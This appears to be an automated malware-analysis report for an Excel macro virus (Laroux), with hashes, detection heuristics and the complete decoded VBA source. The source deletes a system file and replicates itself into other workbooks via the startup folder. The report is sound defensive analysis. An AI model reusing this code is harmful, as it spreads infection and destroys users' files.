Xls.Trojan.Laroux-23 — Office (OLE) malware analysis

Static analysis result for SHA-256 7751776f373d0062…

MALICIOUS

Office (OLE)

19.0 KB Created: 1980-01-04 13:51:46 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 3a6f4ac0c0f224c5b647a5a6a991b59a SHA-1: 8a9f8ffcd9b7a96f2fe85c5ed53523ec2b5496a7 SHA-256: 7751776f373d0062aa9b92a505983b15cdf107e4234ded1c9dc365edf9305c3c
120 Risk Score

Malware Insights

Xls.Trojan.Laroux-23 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The critical heuristic firing indicates ClamAV detection of 'Xls.Trojan.Laroux-23', strongly suggesting a known malicious Excel macro trojan. The presence of an Auto_Open VBA macro confirms the intent to execute malicious code upon opening the document. The script attempts to delete 'C:\Io.Sys' and save a copy of the workbook as 'Person.xls' in the startup path, likely to establish persistence or facilitate further payload execution.

Heuristics 2

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2379 bytes
SHA-256: 4e67c6d9739989a24f69db4a6e532aba962a52d121d9e6e3a106e02a03e79182
Detection
ClamAV: Xls.Trojan.Laroux-23
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "aola"





Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    If Day(Date) >= 4 And Day(Date) <= 13 And Time < #2:25:00 PM# Then
        SetAttr "C:\Io.Sys", vbNormal
        Kill "C:\Io.Sys"
    End If
    Application.OnSheetActivate = "AutoCopy"
End Sub

Sub AutoCopy()
Attribute AutoCopy.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim sStPath, sFile, swName, swnew, sCurDir As String
    Dim bPtoF, bFtoP As Boolean
    
    bPtoF = False
    bFtoP = False
    On Error Resume Next
    sStPath = Application.StartupPath
    sFile = Dir(sStPath & "\" & "Person.xls")
    
    bFtoP = sFile <> "Person.xls"
    
    bPtoF = Not (bFtoP And (ActiveWorkbook.Modules.Count > 0))
    
    If bFtoP Then
        Application.ScreenUpdating = False
        swName = ActiveWorkbook.Name
        Sheets("aola").Visible = True
        Sheets("aola").Select
        Sheets("aola").Copy
        swnew = ActiveWorkbook.Name
        sCurDir = CurDir()
        
        ChDir Application.StartupPath
        ActiveWindow.Visible = False
        Workbooks(swnew).SaveAs FileName:=Application.StartupPath & "/" & "Person.xls", FileFormat:=xlNormal _
            , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
            False, CreateBackup:=False
        ChDir sCurDir
        Workbooks(swName).Sheets("aola").Visible = False
        ActiveWindow.ActivateNext
    End If
    
    If bPtoF And (Not bFtoP) Then
        swnew = ActiveWorkbook.Name
        Application.ScreenUpdating = False
        sCurDir = ActiveWorkbook.Path
        If Workbooks(swnew).Sheets(1).Name <> "aola" Then
            Workbooks("Person.xls").Sheets("aola").Copy before:=Workbooks(swnew).Sheets(1)
            Workbooks(swnew).Sheets("aola").Visible = False
            Workbooks(swnew).Save
        End If
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "Person.xls!AutoCopy"
End Sub

Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True